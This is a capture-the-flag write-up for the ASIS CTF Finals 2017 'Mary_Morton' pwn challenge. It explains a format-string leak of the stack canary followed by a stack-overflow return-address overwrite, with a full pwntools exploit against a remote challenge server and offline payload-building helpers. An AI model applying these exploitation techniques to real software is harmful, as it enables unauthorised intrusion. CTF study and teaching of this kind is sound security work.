Mary_Morton

Source: ASIS CTF Finals 2017

Description: a very simple warm-up pwn

The binary is built with a stack canary, so the exploit has two stages: first use the format string bug to leak the canary, then use the stack overflow to overwrite the return address with the address of the backdoor function, writing the leaked canary back into its slot so the check before the return still passes. The argument index for the leak (%23$p here) is found by probing the stack with %N$p; on x86-64 glibc a plausible canary is a 64-bit value whose lowest byte is 0x00, which is a quick sanity check on whatever comes back.

The exploit:

from pwn import *

# io = process('./pwn')
# io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)
backdoor_addr = 0x4008DA

# menu option 2: the format string bug; direct parameter access with %23$p
# prints the stack slot holding the canary as a hex pointer
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'2')
sleep(1)
io.sendline(b'%23$p\n')
canary = int(io.recvline().strip(), 16)
info('canary: ' + hex(canary))

# menu option 1: the stack overflow; 136 bytes of filler reach the canary
# slot, then the leaked canary, a saved rbp, and the backdoor as return address
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)

io.interactive()
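The two pieces of the exploit that are easy to get subtly wrong are parsing the leak and laying out the overflow. The helpers below are an added example, not part of the original write-up or the challenge: they use only the standard library (no pwntools) so they run offline, and they assume the same frame layout the exp above uses (136 bytes of filler, then canary, saved rbp, return address). The probe loop that finds the argument index is simulated with a constructed sample of echoed lines, since the real binary is not available here.

```python
"""Helpers for the format-string canary leak + stack overflow used in the
Mary_Morton exp above.  Added example, not from the original write-up;
standard library only, so it runs without pwntools or the binary.
The frame layout constants are assumed to match the exp on this page."""
import re
import struct

BUF_TO_CANARY = 136      # 'a' * 136 reaches the canary slot
CANARY_FMT_INDEX = 23    # '%23$p' is the argument position that leaks the canary here

HEX_RE = re.compile(rb"^0x([0-9a-fA-F]{1,16})$")


def probe(index: int) -> bytes:
    """Format string that prints the index-th variadic argument as a pointer."""
    return b"%%%d$p" % index          # probe(23) -> b'%23$p'


def parse_leak(line: bytes) -> int:
    """Turn the program's echo of '%N$p' (e.g. b'0x5d2e1c8a3f7b9100\\n') into an int.
    printf prints a NULL argument as '(nil)', which is not a usable leak."""
    text = line.strip()
    m = HEX_RE.match(text)
    if not m:
        raise ValueError("not a %%p leak: %r" % (text,))
    return int(m.group(1), 16)


def looks_like_canary(value: int) -> bool:
    """glibc's x86_64 stack-protector value: 8 bytes whose lowest byte is 0x00
    (so a string copy cannot carry it along) and which is not otherwise zero."""
    return 0 < value < (1 << 64) and (value & 0xFF) == 0 and (value >> 8) != 0


def find_canary_index(leaks):
    """Given {index: echoed_line} from probing '%1$p', '%2$p', ..., return the
    first index whose value looks like a canary.  Lines that do not parse
    ('(nil)', text) are skipped."""
    for index in sorted(leaks):
        try:
            value = parse_leak(leaks[index])
        except ValueError:
            continue
        if looks_like_canary(value):
            return index
    return None


def p64(value: int) -> bytes:
    """Little-endian 8-byte pack, same as pwntools' p64 on x86_64."""
    return struct.pack("<Q", value)


def build_payload(canary: int, ret_addr: int, saved_rbp: int = 0) -> bytes:
    """Overflow payload: filler up to the canary slot, the leaked canary (so
    __stack_chk_fail is not reached), a saved rbp, then the return address."""
    if not looks_like_canary(canary):
        raise ValueError("refusing to build payload with implausible canary %#x" % canary)
    return b"a" * BUF_TO_CANARY + p64(canary) + p64(saved_rbp) + p64(ret_addr)


def payload_layout(payload: bytes) -> dict:
    """Decode the three qwords after the filler to double-check the layout."""
    canary, saved_rbp, ret = struct.unpack_from("<QQQ", payload, BUF_TO_CANARY)
    return {"canary": canary, "saved_rbp": saved_rbp, "ret": ret}


# Constructed sample of what a '%N$p' probe loop might echo back; these are
# made-up values, not data captured from the challenge.
SAMPLE_LEAKS = {
    21: b"0x7ffd2c3a9e40\n",         # looks like a stack pointer
    22: b"(nil)\n",                  # NULL
    23: b"0x5d2e1c8a3f7b9100\n",     # low byte 0x00: the canary
    24: b"0x4008da\n",               # looks like a text address
}

if __name__ == "__main__":
    idx = find_canary_index(SAMPLE_LEAKS)
    canary = parse_leak(SAMPLE_LEAKS[idx])
    payload = build_payload(canary, 0x4008DA)
    print("canary at %s, value %#x, payload %d bytes" % (probe(idx).decode(), canary, len(payload)))
    print(payload_layout(payload))
```

In a live session the same functions slot straight into the pwntools exp: `parse_leak(io.recvline())` replaces the bare `int(..., 16)`, and `build_payload` refuses to send a value that cannot be a canary, which catches the common failure where the leak line was actually menu text or `(nil)`.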
